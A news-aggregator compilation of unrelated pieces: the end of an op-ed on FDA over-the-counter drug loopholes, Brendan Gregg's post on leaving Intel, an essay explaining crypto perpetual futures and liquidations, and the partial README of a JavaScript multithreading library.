Even if you accept Bausch & Lomb’s self-serving rationale, the answer is not to allow the loophole to persist, but to close it. The FDA could require that any drug approved as OTC internationally be considered for OTC status in the United States before greenlighting it as a prescription product — and mandate retroactive review of cases like Miebo.

The FDA’s OTC monograph process, which assesses the safety and efficacy of nonprescription drugs, makes this feasible, though it may need to be adjusted slightly. Those changes might involve incorporating a mechanism to make sure that overseas OTC status triggers a review of U.S. prescription drugs containing the same active ingredients or formulations for potential OTC designation; developing criteria to assess equivalency in safety and efficacy standards between U.S. OTC requirements and those of other countries; and establishing a retroactive review pathway within the monograph process to handle existing prescription drugs already marketed OTC internationally.

EvoTears thrives abroad without safety concerns, countering industry claims of stricter U.S. standards. This reform would deter companies from repackaging OTC drugs as high-cost prescriptions, fostering competition and lowering prices.

While this tactic isn’t widespread, it joins loopholes like late-listed patents, picket fence patents, or pay-for-delay generic deals that undermine trust in an industry whose employees largely aim to save lives.

Miebo also shows how global reference pricing could save billions. Aligning with European prices could cut consumer costs while reducing doctor visits, pharmacy time, and administrative burdens. For patients who skip doses to afford groceries, lower prices would mean better access and health. Reforms like the 2022 Inflation Reduction Act’s Medicare price negotiations set a precedent, but targeted rules are urgently needed.

Unexplained differences in drug prices between the U.S. and other wealthy countries erode the public’s trust in health care. Companies like Bausch & Lomb exploit systemic gaps, leaving patients and payers to foot exorbitant bills. An OTC evaluation rule, with retroactive reviews, is a practical first step, signaling that patient access takes precedence over corporate greed.

Let’s end the price-gouging practices of outliers and build a health care system that puts patients first. Just as targeting criminal outliers fosters a law-abiding society, holding bad pharmaceutical actors accountable is crucial for restoring trust and integrity to our health care system. While broader approaches to making health care more fair, accessible, and affordable are needed, sometimes the way to save billions is to start by saving hundreds of millions.

David Maris is a six-time No. 1 ranked pharmaceutical analyst with more than two decades covering the industry. He currently runs Phalanx Investment Partners, a family office; is a partner in Wall Street Beats; and is co-author of the recently published book “The Fax Club Experiment.” He is currently working on his next book about health care in America.

Leaving Intel

Hacker News
www.brendangregg.com
2025-12-05 21:27:04
Comments...
Original Article

I've resigned from Intel and accepted a new opportunity. If you are an Intel employee, you might have seen my fairly long email that summarized what I did in my 3.5 years. Much of this is public:

It's still early days for AI flame graphs. Right now when I browse CPU performance case studies on the Internet, I'll often see a CPU flame graph as part of the analysis. We're a long way from that kind of adoption for GPUs (and it doesn't help that our open source version is Intel only), but I think as GPU code becomes more complex, with more layers, the need for AI flame graphs will keep increasing.

I also supported cloud computing, participating in 110 customer meetings, and created a company-wide strategy to win back the cloud with 33 specific recommendations, in collaboration with others across 6 organizations. It is some of my best work and features a visual map of interactions between all 19 relevant teams, described by Intel long-timers as the first time they have ever seen such a cross-company map. (This strategy, summarized in a slide deck, is internal only.)

I always wish I did more, in any job, but I'm glad to have contributed this much especially given the context: I overlapped with Intel's toughest 3 years in history, and I had a hiring freeze for my first 15 months.

My fond memories from Intel include meeting Linus at an Intel event who said "everyone is using fleme graphs these days" (Finnish accent), meeting Pat Gelsinger who knew about my work and introduced me to everyone at an exec all hands, surfing lessons at an Intel Australia and HP offsite (mp4), and meeting Harshad Sane (Intel cloud support engineer) who helped me when I was at Netflix and now has joined Netflix himself -- we've swapped ends of the meeting table. I also enjoyed meeting Intel's hardware fellows and senior fellows who were happy to help me understand processor internals. (Unrelated to Intel, but if you're a Who fan like me, I recently met some other people as well!)

My next few years at Intel would have focused on execution of those 33 recommendations, which Intel can continue to do in my absence. Most of my recommendations aren't easy, however, and require accepting change, ELT/CEO approval, and multiple quarters of investment. I won't be there to push them, but other employees can (my CloudTeams strategy is in the inbox of various ELT, and in a shared folder with all my presentations, code, and weekly status reports). This work will hopefully live on and keep making Intel stronger. Good luck.

Perpetual Futures

Hacker News
www.bitsaboutmoney.com
2025-12-05 21:23:03
Comments...
Original Article

Programming note: Bits about Money is supported by our readers. I generally forecast about one issue a month, and haven't kept that pace this year. As a result, I'm working on about 3-4 for December.

Much financial innovation is in the ultimate service of the real economy. Then, we have our friends in crypto, who occasionally do intellectually interesting things which do not have a locus in the real economy. One of those things is perpetual futures (hereafter, perps), which I find fascinating and worthy of study, the same way that a virologist just loves geeking out about furin cleavage sites.

You may have read a lot about stablecoins recently. I may write about them (again; see past BAM issue) in the future, as there has in recent years been some uptake of them for payments. But it is useful to understand that a plurality of stablecoins collateralize perps. Some observers are occasionally strategic in whether they acknowledge this, but for payments use cases, it does not require a lot of stock to facilitate massive flows. And so of the $300 billion or so in stablecoins presently outstanding, about a quarter sit on exchanges. The majority of that is collateralizing perp positions.

Perps are the dominant way crypto trades, in terms of volume. (It bounces around but is typically 6-8 times larger than spot.) This is similar to most traditional markets: where derivatives are available, derivative volume swamps spot volume. The degree to which it does depends on the market, Schelling points, user culture, and similar. For example, in India, most retail investing in equity is actually through derivatives; this is not true of the U.S. In the U.S., most retail equity exposure is through the spot market, directly holding stocks or indirectly through ETFs or mutual funds. Most trading volume of the stock indexes, however, is via derivatives.

Beginning with the problem

The large crypto exchanges are primarily casinos, who use the crypto markets as a source of numbers, in the same way a traditional casino might use a roulette wheel or set of dice. The function of a casino is for a patron to enter it with money and, statistically speaking, exit it with less. Physical casinos are often huge capital investments with large ongoing costs, including the return on that speculative capital. If they could choose to be less capital intensive, they would do so, but they are partially constrained by market forces and partially by regulation.

A crypto exchange is also capital intensive, not because the website or API took much investment (relatively low, by the standards of financial software) and not because they have a physical plant, but because trust is expensive. Bettors, and the more sophisticated market makers, who are the primary source of action for bettors, need to trust that the casino will actually be able to pay out winnings. That means the casino needs to keep assets (generally, mostly crypto, but including a smattering of cash for those casinos which are anomalously well-regarded by the financial industry) on hand exceeding customer account balances.

Those assets are… sitting there, doing nothing productive. And there is an implicit cost of capital associated with them, whether nominal (and borne by a gambler) or material (and borne by a sophisticated market making firm, crypto exchange, or the crypto exchange’s affiliate which trades against customers [0]).

Perpetual futures exist to provide the risk gamblers seek while decreasing the total capital requirement (shared by the exchange and market makers) to profitably run the enterprise.

Perps predate crypto but found a home there

In the commodities futures markets, you can contract to either buy or sell some standardized, valuable thing at a defined time in the future. The overwhelming majority of contracts do not result in taking delivery; they’re cancelled by an offsetting contract before that specified date.

Given that speculation and hedging are such core use cases for futures, the financial industry introduced a refinement: cash-settled futures. Now there is a reference price for the valuable thing, with a great deal of intellectual effort put into making that reference price robust and fair (not always successfully). Instead of someone notionally taking physical delivery of pork bellies or barrels of oil, people who are net short the future pay people who are net long the future on delivery day. (The mechanisms of this clearing are fascinating but outside today’s scope.)

Back in the early nineties, economist Robert Shiller proposed a refinement to cash-settled futures: if you don’t actually want pork bellies or oil barrels for consumption in April, and we accept that almost no futures participants actually do, why bother closing out the contracts in April? Why fragment the liquidity for contracts between April, May, June, etc.? Just keep the market going perpetually.

This achieved its first widespread popular use in crypto (Bitmex is generally credited as being the popularizer), and hereafter we’ll describe the standard crypto implementation. There are, of course, variations available.

Multiple settlements a day

Instead of all of a particular futures vintage settling on the same day, perps settle multiple times a day for a particular market on a particular exchange. The mechanism for this is the funding rate. At a high level: winners get paid by losers every e.g. 4 hours and then the game continues, unless you’ve been blown out due to becoming overleveraged or for other reasons (discussed in a moment).

Consider a toy example: a retail user buys 0.1 Bitcoin via a perp. The price on their screen, which they understand to be for Bitcoin, might be $86,000 each, and so they might pay $8,600 cash. Should the price rise to $90,000 before the next settlement, they will get +/- $400 of winnings credited to their account, and their account will continue to reflect exposure to 0.1 units of Bitcoin via the perp. They might choose to sell their future at this point (or any other). They’ll have paid one commission (and a spread) to buy, one (of each) to sell, and perhaps they’ll leave the casino with their winnings, or perhaps they’ll play another game.
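
To make those cash flows concrete, here is a minimal sketch of the settlement arithmetic in TypeScript. The numbers mirror the toy example above; the function and variable names are my own illustration, not any exchange's API.

// Mark-to-market settlement for a simple, unlevered perp position.
function settlementPnl(positionUnits: number, entryPrice: number, settlePrice: number): number {
  return positionUnits * (settlePrice - entryPrice);
}

// 0.1 BTC bought at $86,000, settled at $90,000:
console.log(settlementPnl(0.1, 86_000, 90_000)); // 400: credited to the long, debited from the symmetric short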

Where did the money come from? Someone else was symmetrically short exposure to Bitcoin via a perp. It is, with some very important caveats incoming, a closed system: since no good or service is being produced except the speculation, winning money means someone else lost.

One fun wrinkle for funding rates: some exchanges cap the amount the rate can be for a single settlement period. This is similar in intent to traditional markets’ usage of circuit breakers : designed to automatically blunt out-of-control feedback loops. It is dissimilar in that it cannot actually break circuits: changes to funding rate can delay realization of losses but can’t prevent them, since they don’t prevent the realization of symmetrical gains.

Perp funding rates also embed an interest rate component. This might get quoted as 3 bps a day, or 1 bps every eight hours, or similar. However, because of the impact of leverage, gamblers are paying more than you might expect: at 10X leverage that’s 30 bps a day. Consumer finance legislation standardizes borrowing costs as APR rather than basis points per day so that an unscrupulous lender can’t bury a 200% APR in the fine print.
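
To see what that quoting convention hides, here is a back-of-the-envelope sketch (my own illustration, not any exchange's formula) of how a per-day funding rate compounds into an annualized cost on levered equity:

// Effective annual borrowing cost implied by a per-day funding rate.
// 1 bp = 0.0001; leverage multiplies the rate paid on your equity.
function annualizedFundingCost(bpsPerDay: number, leverage: number): number {
  const dailyRate = bpsPerDay * 0.0001 * leverage;
  return Math.pow(1 + dailyRate, 365) - 1; // compounded daily
}

console.log(annualizedFundingCost(3, 1));  // ~0.116, i.e. ~11.6% APR unlevered
console.log(annualizedFundingCost(3, 10)); // ~1.98, i.e. ~198% APR at 10X: the fine-print problem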

Convergence in prices via the basis trade

Prices for perps do not, as a fact of nature, exactly match the underlying. That is a feature for some users.

In general, when the market is exuberant, the perp will trade above spot (the underlying market). To close the gap, a sophisticated market participant should do the basis trade : make offsetting trades in perps and spot (short the perp and buy spot, here, in equal size). Because the funding rate is set against a reference price for the underlying, longs will be paying shorts more (as a percentage of the perp’s current market price). For some of them, that’s fine: the price of gambling went up, oh well. For others, that’s a market incentive to close out the long position, which involves selling it, which will decrease the price at the margin (in the direction of spot).

The market maker can wait for price convergence; if it happens, they can close the trade at a profit, while having been paid to maintain the trade. If the perp continues to trade rich, they can just continue getting the increased funding cost. To the extent this is higher than their own cost of capital, this can be extremely lucrative.

Flip the polarities of these to understand the other direction.

The basis trade, classically executed, is delta neutral: one isn’t exposed to the underlying itself. You don’t need any belief in Bitcoin’s future adoption story, fundamentals, market sentiment, halvings, none of that. You’re getting paid to provide the gambling environment, including a really important feature: the perp price needs to stay reasonably close to the spot price, close enough to continue attracting people who want to gamble. You are also renting access to your capital for leverage.
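
As a rough sketch of why the classic trade is delta neutral (illustrative numbers only, ignoring fees, slippage, and collateral haircuts):

// Long 1 BTC spot, short 1 BTC-equivalent perp: price moves cancel,
// leaving funding payments plus any basis convergence.
function basisTradePnl(spotEntry: number, spotExit: number, perpEntry: number, perpExit: number, fundingReceived: number): number {
  const spotLeg = spotExit - spotEntry;  // long spot
  const perpLeg = perpEntry - perpExit;  // short perp
  return spotLeg + perpLeg + fundingReceived;
}

// A 10% crash hits both legs symmetrically; the market maker keeps the funding.
console.log(basisTradePnl(86_000, 77_400, 86_200, 77_580, 120)); // 140: 20 of basis convergence plus 120 of funding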

You are also underwriting the exchange: if they blow up, your collateral becoming a claim against the bankruptcy estate is the happy scenario. (As one motivating example: Galois Capital, a crypto hedge fund doing basis trades, had ~40% of its assets on FTX when it went down. They then wound down the fund, selling the bankruptcy claim for 16 cents on the dollar .)

Recall that the market can’t function without a system of trust saying that someone is good for it if a bettor wins. Here, the market maker is good for it, via the collateral it kept on the exchange.

Many market makers function across many different crypto exchanges. This is one reason they’re so interested in capital efficiency: fully collateralizing all potential positions they could take across the universe of venues they trade on would be prohibitively capital intensive, and if they do not pre-deploy capital, they miss profitable trading opportunities. [1]

Leverage and liquidations

Gamblers like risk; it amps up the fun. Since one has many casinos to choose from in crypto, the ones which offer only “regular” exposure to Bitcoin (via spot or perps) would be offering a less-fun product for many users than the ones which offer leverage. How much leverage? More leverage is always the answer to that question, until predictable consequences start happening.

In a standard U.S. brokerage account, Regulation T has, for almost 100 years now, set maximum leverage limits (by setting minimums for margins). These are 2X at position opening time and 4X “maintenance” (before one closes out the position). Your brokerage would be obligated to forcibly close your position if volatility causes you to exceed those limits.

As a simplified example, if you have $50k of cash, you’d be allowed to buy $100k of stock. You now have $50k of equity and a $50k loan: 2x leverage. Should the value of that stock decline to about $67k, you still owe the $50k loan, and so only have $17k remaining equity. You’re now on the precipice of being 4X leveraged, and should expect a margin call very soon, if your broker hasn’t “blown you out of the trade” already.
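
That arithmetic, sketched out (using the simplified numbers above, not any broker's actual maintenance formula):

// Leverage = position value / equity, where equity = position value - loan.
function leverage(positionValue: number, loan: number): number {
  return positionValue / (positionValue - loan);
}

console.log(leverage(100_000, 50_000)); // 2 at position opening
console.log(leverage(67_000, 50_000));  // ~3.94, on the precipice of 4X

// Solving leverage(p, loan) = 4 gives p = loan * 4/3, the value at which the margin call arrives:
console.log(50_000 * 4 / 3); // ~66,667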

What part of that is relevant to crypto? For the moment, just focus on that number: 4X.

Perps are offered at 1X (non-levered exposure). But they’re routinely offered at 20X, 50X, and 100X. SBF, during his press tour / regulatory blitz about being a responsible financial magnate fleecing the customers in an orderly fashion, voluntarily self-limited FTX to 20X.

One reason perps are structurally better for exchanges and market makers is that they simplify the business of blowing out leveraged traders. The exact mechanics depend on the exchange, the amount, etc, but generally speaking you can either force the customer to enter a closing trade or you can assign their position to someone willing to bear the risk in return for a discount.

Blowing out losing traders is lucrative for exchanges except when it catastrophically isn’t. It is a priced service in many places. The price is quoted to be low (“a nominal fee of 0.5%” is one way Binance describes it) but, since it is calculated from the amount at risk, it can be a large portion of the money lost: 0.5% of a 20X position’s notional is 10% of the trader’s margin. If the account’s negative balance is less than the liquidation fee, wonderful, thanks for playing, and the exchange / “the insurance fund” keeps the rest, as a tip.

In the case where the amount an account is negative by is more than the fee, that “insurance fund” can choose to pay the winners on behalf of the liquidated user, at management’s discretion. Management will usually decide to do this, because a casino with a reputation for not paying winners will not long remain a casino.

But tail risk is a real thing. The capital efficiency has a price: there physically does not exist enough money in the system to pay all winners given sufficiently dramatic price moves. Forced liquidations happen. Sophisticated participants withdraw liquidity (for reasons we’ll soon discuss) or the exchange becomes overwhelmed technically / operationally. The forced liquidations eat through the diminished / unreplenished liquidity in the book, and the magnitude of the move increases.

Then crypto gets reminded about automatic deleveraging (ADL), a detail to perp contracts that few participants understand.

We have altered the terms of your unregulated futures investment contract.

(Pray we do not alter them further.)

Risk in perps has to be symmetric: if (accounting for leverage) there are 100,000 units of Somecoin exposure long, then there are 100,000 units of Somecoin exposure short. This does not imply that the shorts or longs are sufficiently capitalized to actually pay for all the exposure in all instances.

In cases where management deems paying winners from the insurance fund would be too costly and/or impossible, they automatically deleverage some winners. In theory, there is a published process for doing this, because it would be confidence-costing to ADL non-affiliated accounts but pay out affiliated accounts, one’s friends or particularly important counterparties, etc. In theory.

In theory, one likely ADLs accounts which were quite levered before ones which were less levered, and one ADLs accounts which had high profits before ones with lower profits. In theory. [2]

So perhaps you understood, prior to a 20% move, that you were 4X leveraged. You just earned 80%, right? Ah, except you were only 2X leveraged, so you earned 40%. Why were you retroactively only 2X? That’s what automatic deleveraging means. Why couldn’t you get the other 40% you feel entitled to? Because the collective group of losers doesn’t have enough to pay you your winnings and the insurance fund was insufficient or deemed insufficient by management.
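
In sketch form (my own illustration of that retroactive-leverage arithmetic; real exchanges each publish their own ADL mechanics):

// Return on equity is the price move times the leverage you actually,
// retroactively, had after automatic deleveraging.
const returnOnEquity = (priceMove: number, effectiveLeverage: number): number =>
  priceMove * effectiveLeverage;

console.log(returnOnEquity(0.20, 4)); // 0.8: the 80% you thought you earned at 4X
console.log(returnOnEquity(0.20, 2)); // 0.4: the 40% you actually got after being ADLed to 2X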

ADL is particularly painful for sophisticated market participants doing e.g. a basis trade, because they thought e.g. they were 100 units short via perps and 100 units long somewhere else via spot. If it turns out they were actually 50 units short via perps, but 100 units long, their net exposure is +50 units, and they have very possibly just gotten absolutely shellacked.

In theory, this can happen to the upside or the downside. In practice in crypto, this seems to usually happen after sharp decreases in prices, not sharp increases. For example, October 2025 saw widespread ADLing as (more than) $19 billion of liquidations happened, across a variety of assets. Alameda’s CEO Caroline Ellison testified that they lost over $100 million during the collapse of Terra’s stablecoin in 2022; since FTX’s insurance fund was made up, when leveraged traders lost money, their positions were frequently taken up by Alameda. That was quite lucrative much of the time, but catastrophically expensive during e.g. the Terra blowup. Alameda was a good loser and paid the winners, though: with other customers’ assets that they “borrowed.”

An aside about liquidations

In the traditional markets, if one’s brokerage deems one’s assets are unlikely to be able to cover the margin loan from the brokerage one has used, one’s brokerage will issue a margin call. Historically that gave one a relatively short period (typically, a few days) to post additional collateral, either by moving in cash, by transferring assets from another brokerage, or by experiencing appreciation in the value of one’s assets. Brokerages have the option, and in some cases the requirement, to manage risk after or during a margin call by forcing trades on behalf of the customer to close positions.

It sometimes surprises crypto natives that, in the case where one’s brokerage account goes negative and all assets are sold, with a negative remaining balance, the traditional markets largely still expect you to pay that balance. This contrasts with crypto, where the market expectation for many years was that the customer was Daffy Duck with a gmail address and a pseudonymous set of numbered accounts recorded on a blockchain, and dunning them was a waste of time. Crypto exchanges have mostly, in the intervening years, either stepped up their game regarding KYC or pretended to do so, but the market expectation is still that a defaulting user will basically never successfully recover. (Note that the legal obligation to pay is not coextensive with users actually paying. The retail speculators with $25,000 of capital that the pattern day trader rules are worried about will often not have $5,000 to cover a deficiency. On the other end of the scale, when a hedge fund blows up, the fund entity is wiped out, but its limited partners—pension funds, endowments, family offices—are not on the hook to the prime broker, and nobody expects the general partner to start selling their house to make up the difference.)

So who bears the loss when the customer doesn’t, can’t, or won’t? The waterfall depends on market, product type, and geography, but as a sketch: brokerages bear the loss first, out of their own capital. They’re generally required to keep a reserve for this purpose.

A brokerage will, in the ordinary course of business, have obligations to other parties which would be endangered if they were catastrophically mismanaged and could not successfully manage risk during a downturn. (It’s been known to happen, and even can be associated with assets rather than liabilities.) In this case, most of those counterparties are partially insulated by structures designed to insure the peer group. These include e.g. clearing pools, guaranty funds capitalized by the member firms of a clearinghouse, the clearinghouse’s own capital, and perhaps mutualized insurance pools. That is the rough ordering of the waterfall, which varies depending on geography/product/market.

One can imagine a true catastrophe which burns through each of those layers of protection, and in that case, the clearinghouse might be forced to assess members or allocate losses across survivors. That would be a very, very bad day, but contracts exist to be followed on very bad days.

One commonality with crypto, though: this system is also not fully capitalized against all possible events at all times. Unlike crypto, which for contingent reasons pays some lip service to being averse to credit even as it embraces leveraged trading, the traditional industry relies extensively on underwriting risk of various participants.

Will crypto successfully “export” perps?

Many crypto advocates believe that they have something which the traditional finance industry desperately needs. Perps are crypto’s most popular and lucrative product, but they probably won’t be adopted materially in traditional markets.

Existing derivatives products already work reasonably well at solving the cost of capital issue. Liquidations are not the business model of traditional brokerages. And learning, on a day when markets are 20% down, that you might be hedged or you might be bankrupt, is not a prospect which fills traditional finance professionals with the warm fuzzies.

And now you understand the crypto markets a bit better.

[0] Brokers trading with their own customers can happen in the ordinary course of business, but has been progressively discouraged in traditional finance, as it enables frontrunning.

Frontrunning, while it is understood in the popular parlance to mean “trading before someone else can trade” and often brought up in discussions of high frequency trading using very fast computers, does not historically mean that. It historically describes a single abusive practice: a broker could basically use the slowness of traditional financial IT systems to give conditional post-facto treatment to customer orders, taking the other side of them (if profitable) or not (if not). Frontrunning basically disappeared because customers now get order confirms almost instantly by computer, not at end of day via a phone call. The confirm has the price the trade executed at on it.

In classic frontrunning, you sent the customer’s order to the market (at some price X), waited a bit, and then observed a later price Y. If Y was worse for the customer than X, well, them’s the breaks on Wall Street. If Y was better, you congratulated the customer on their investing acumen, and informed them that they had successfully transacted at Z, a price of your choosing between X and Y. You then fraudulently inserted a recorded transaction between the customer and yourself earlier in the day, at price Z, and assigned the transaction which happened at X to your own account, not to the customer’s account.

Frontrunning was a lucrative scam while it lasted, because (effectively) the customer takes 100% of the risk of the trade but the broker gets any percentage they want of the first day’s profits. This is potentially so lucrative that smart money (and some investors in his funds!) thought Madoff was doing it, thus generating the better-than-market stable returns for over a decade through malfeasance. Of frontrunning Madoff was entirely innocent.

Some more principled crypto participants have attempted to discourage exchanges from trading with their own customers. They have mostly been unsuccessful. Merit Peak Limited is Binance’s captive entity which does this; it is also occasionally described by U.S. federal agencies as running a sideline in money laundering. Alameda Research was FTX’s affiliated trading fund; their management was criminally convicted of money laundering. Etc., etc.

One of the reasons this behavior is so adaptive is because the billions of dollars sloshing around can be described to banks as “proprietary trading” and “running an OTC desk”, and an inattentive bank (like, say, Silvergate, as recounted here) might miss the customer fund flows they would have been formally unwilling to facilitate. This is a useful feature for sophisticated crypto participants, and so some of them do not draw attention to the elephant in the room, even though it is averse to their interests.

[1] Not all crypto trades are pre-funded. Crypto OTC transactions sometimes settle on T+1, with the OTC desk essentially extending credit in the fashion that a prime broker would in traditional markets. But most transactions on exchanges have to be paid immediately in cash already at the venue. This is very different from traditional equity market structure, where venues don’t typically receive funds flow at all, and settling/clearing happens after the fact, generally by a day or two.

[2] I note, for the benefit of readers of footnote 0, that there is often a substantial gap between the time when market dislocation happens and when a trader is informed they were ADLed. The implications of this are left as an exercise to the reader.


The missing standard library for multithreading in JavaScript

Hacker News
github.com
2025-12-05 21:09:11
Comments...
Original Article

Multithreading.js

Multithreading is a TypeScript library that brings robust, Rust-inspired concurrency primitives to the JavaScript ecosystem. It provides a thread-pool architecture, strict memory safety semantics, and synchronization primitives like Mutexes, Read-Write Locks, and Condition Variables.

This library is designed to abstract away the complexity of managing WebWorkers, serialization, and SharedArrayBuffer semantics, allowing developers to write multi-threaded code that looks and feels like standard asynchronous JavaScript.

Installation

npm install multithreading

Core Concepts

JavaScript is traditionally single-threaded. To achieve true parallelism, this library uses Web Workers. However, unlike standard Workers, this library offers:

  1. Managed Worker Pool: Automatically manages a pool of threads based on hardware concurrency.
  2. Shared Memory Primitives: Tools to safely share state between threads without race conditions.
  3. Scoped Imports: Support for importing external modules and relative files directly within worker tasks.
  4. Move Semantics: Explicit data ownership transfer to prevent cloning overhead.

Quick Start

The entry point for most operations is the spawn function. This submits a task to the thread pool and returns a handle to await the result.

import { spawn } from "multithreading";

// Spawn a task on a background thread
const handle = spawn(() => {
  // This code runs in a separate worker
  const result = Math.random();
  return result;
});

// Wait for the result
const result = await handle.join();

if (result.ok) {
  console.log("Result:", result.value); // 0.6378467071314606
} else {
  console.error("Worker error:", result.error);
}

Passing Data: The move() Function

Because Web Workers run in a completely isolated context, functions passed to spawn cannot capture variables from their outer scope. If you attempt to use a variable inside the worker that was defined outside of it, the code will fail.

To get data from your main thread into the worker, you have to use the move() function.

The move function accepts variadic arguments. These arguments are passed to the worker function in the order they were provided. Despite the name, move handles data in two ways:

  1. Transferable Objects (e.g., ArrayBuffer, Uint32Array): These are "moved" (zero-copy). Ownership transfers to the worker, and the original becomes unusable in the main thread.
  2. Non-Transferable Objects (e.g., JSON, numbers, strings): These are cloned via structured cloning. They remain usable in the main thread.
import { spawn, move } from "multithreading";

// Will be transferred
const largeData = new Uint8Array(1024 * 1024 * 10); // 10MB
// Will be cloned
const metaData = { id: 1 };

// We pass arguments as a comma-separated list.
const handle = spawn(move(largeData, metaData), (data, meta) => {
  console.log("Processing ID:", meta.id);
  return data.byteLength;
});

await handle.join();

SharedJsonBuffer: Sharing Complex Objects

SharedJsonBuffer enables Mutex-protected shared memory for JSON objects, eliminating the overhead of postMessage data copying. Unlike standard buffers, it handles serialization automatically. It supports partial updates, re-serializing only changed bytes rather than the entire object tree for high-performance state synchronization.

import { move, Mutex, SharedJsonBuffer, spawn } from "multithreading";

const sharedState = new Mutex(new SharedJsonBuffer({
  score: 0,
  players: ["Main Thread"],
  level: {
    id: 1,
    title: "Start",
  },
}));

await spawn(move(sharedState), async (lock) => {
  using guard = await lock.acquire();

  const state = guard.value;

  console.log(`Current Score: ${state.score}`);

  // Modify the data
  state.score += 100;
  state.players.push("Worker1");

  // End of scope: Lock is automatically released here
}).join();

// Verify on main thread
using guard = await sharedState.acquire();

console.log(guard.value); // { score: 100, players: ["Main Thread", "Worker1"], ... }

Synchronization Primitives

When multiple threads access shared memory (via SharedArrayBuffer ), race conditions occur. This library provides primitives to synchronize access safely.

Best Practice: It is highly recommended to use the asynchronous methods (e.g., acquire, read, write, wait) rather than their synchronous counterparts. Synchronous blocking halts the entire Worker thread, potentially pausing other tasks sharing that worker.

1. Mutex (Mutual Exclusion)

A Mutex ensures that only one thread can access a specific piece of data at a time.

Option A: Automatic Management (Recommended)

This library leverages the Explicit Resource Management proposal ( using keyword). When you acquire a lock, it returns a guard. When that guard goes out of scope, the lock is automatically released.

import { spawn, move, Mutex } from "multithreading";

const buffer = new SharedArrayBuffer(4);
const counterMutex = new Mutex(new Int32Array(buffer));

spawn(move(counterMutex), async (mutex) => {
  // 'using' automatically calls dispose() at the end of the scope
  using guard = await mutex.acquire();
  
  guard.value[0]++;
  
  // End of scope: Lock is automatically released here
});

Option B: Manual Management (Bun / Standard JS)

If you are using Bun (which doesn't natively support using and uses a transpiler which is incompatible with this library) or prefer standard JavaScript syntax, you must manually release the lock using drop(). Always use a try...finally block to ensure the lock is released even if an error occurs.

import { spawn, move, Mutex } from "multithreading";

const buffer = new SharedArrayBuffer(4);
const counterMutex = new Mutex(new Int32Array(buffer));

spawn(move(counterMutex), async (mutex) => {
  // Note that we have to import drop here, otherwise it wouldn't be available
  const { drop } = await import("multithreading");

  // 1. Acquire the lock manually
  const guard = await mutex.acquire();

  try {
    // 2. Critical Section
    guard.value[0]++;
  } finally {
    // 3. Explicitly release the lock
    drop(guard);
  }
});

2. RwLock (Read-Write Lock)

A RwLock is optimized for scenarios where data is read often but written rarely. It allows multiple simultaneous readers but only one writer.

import { spawn, move, RwLock } from "multithreading";

const lock = new RwLock(new Int32Array(new SharedArrayBuffer(4)));

// Spawning a Writer
spawn(move(lock), async (l) => {
  // Blocks until all readers are finished (asynchronously)
  using guard = await l.write(); 
  guard.value[0] = 42;
});

// Spawning Readers
spawn(move(lock), async (l) => {
  // Multiple threads can hold this lock simultaneously
  using guard = await l.read(); 
  console.log(guard.value[0]);
});

3. Semaphore

A Semaphore limits the number of threads that can access a resource simultaneously. Unlike a Mutex (which allows exactly 1 owner), a Semaphore allows N owners. This is essential for rate limiting, managing connection pools, or bounding concurrency.

import { spawn, move, Semaphore } from "multithreading";

// Initialize with 3 permits (allowing 3 concurrent tasks)
const semaphore = new Semaphore(3);

for (let i = 0; i < 10; i++) {
  spawn(move(semaphore), async (sem) => {
    console.log("Waiting for slot...");
    
    // Will wait (async) if 3 threads are already working
    using _ = await sem.acquire(); 
    
    console.log("Acquired slot! Working...");

    await new Promise(r => setTimeout(r, 1000));
    
    // Guard is disposed automatically, releasing the permit for the next thread
  });
}

Manual Release

As with the Mutex, if you cannot use the using keyword, you can manage the lifecycle manually.

spawn(move(semaphore), async (sem) => {
  const { drop } = await import("multithreading");
  // Acquire 2 permits at once
  const guard = await sem.acquire(2);
  
  try {
    // Critical Section
  } finally {
    // Release the 2 permits
    drop(guard);
  }
});

4. Condvar (Condition Variable)

A Condvar allows threads to wait for a specific condition to become true. It saves CPU resources by putting the task to sleep until it is notified, rather than constantly checking a value.

import { spawn, move, Mutex, Condvar } from "multithreading";

const mutex = new Mutex(new Int32Array(new SharedArrayBuffer(4)));
const cv = new Condvar();

spawn(move(mutex, cv), async (lock, cond) => {
  using guard = await lock.acquire();
  
  // Wait until value is not 0
  while (guard.value[0] === 0) {
    // wait() unlocks the mutex, waits for notification, then re-locks.
    await cond.wait(guard);
  }
  
  console.log("Received signal, value is:", guard.value[0]);
});
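
The example above shows only the waiting side. Here is a minimal sketch of the notifying side on the main thread, reusing the mutex and cv objects from the example (an illustration, not the library's documentation):

{
  // Make the condition true under the lock, then wake one waiter.
  using guard = await mutex.acquire();
  guard.value[0] = 1;
  cv.notifyOne();
  // End of scope: lock released, so the woken task can re-acquire it
}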

Channels (MPMC)

For higher-level communication, this library provides a Multi-Producer, Multi-Consumer (MPMC) bounded channel. This primitive mimics Rust's std::sync::mpsc but allows for multiple consumers. It acts as a thread-safe queue that handles backpressure, blocking receivers when empty and blocking senders when full.

Channels are the preferred way to coordinate complex workflows (like job queues or pipelines) between workers without manually managing locks.

Key Features

  • Arbitrary JSON Data: Channels are backed by SharedJsonBuffer, allowing you to send any JSON-serializable value (objects, arrays, strings, numbers, booleans) through the channel, not just raw integers.
  • Bounded: You define a capacity. If the channel is full, send() waits. If empty, recv() waits.
  • Clonable: Both Sender and Receiver can be cloned and moved to different workers.
  • Reference Counted: The channel automatically closes when all Senders are dropped (indicating no more data will arrive) or all Receivers are dropped.

Example: Worker Pipeline with Objects

import { spawn, move, channel } from "multithreading";

// Create a channel that holds objects
const [tx, rx] = channel<{ hello: string }>();

// Producer Thread
spawn(move(tx), async (sender) => {
  await sender.send({ hello: "world" });
  await sender.send({ hello: "multithreading" });
  // Sender is destroyed here, automatically closing the channel
});

// Consumer Thread
spawn(move(rx.clone()), async (rx) => {
  for await (const value of rx) {
    console.log(value); // { hello: "world" }
  }
});

// Because we cloned rx, we can also receive on the main thread 
for await (const value of rx) {
  console.log(value); // { hello: "world" }
}

Importing Modules in Workers

One of the most difficult aspects of Web Workers is handling imports. This library takes care of them automatically, enabling you to use dynamic await import() calls inside your spawned functions.

You can import:

  1. External Libraries: Packages from npm/CDN (depending on environment).
  2. Relative Files: Files relative to the file calling spawn.

Note: The function passed to spawn must be self-contained or explicitly import what it needs. It cannot access variables from the outer scope unless they are passed via move().

Example: Importing Relative Files and External Libraries

Assume you have a file structure:

  • main.ts
  • utils.ts (contains export const magicNumber = 42;)

// main.ts
import { spawn } from "multithreading";

spawn(async () => {
  // 1. Importing a relative file
  // This path is relative to 'main.ts' (the caller location)
  const utils = await import("./utils.ts");
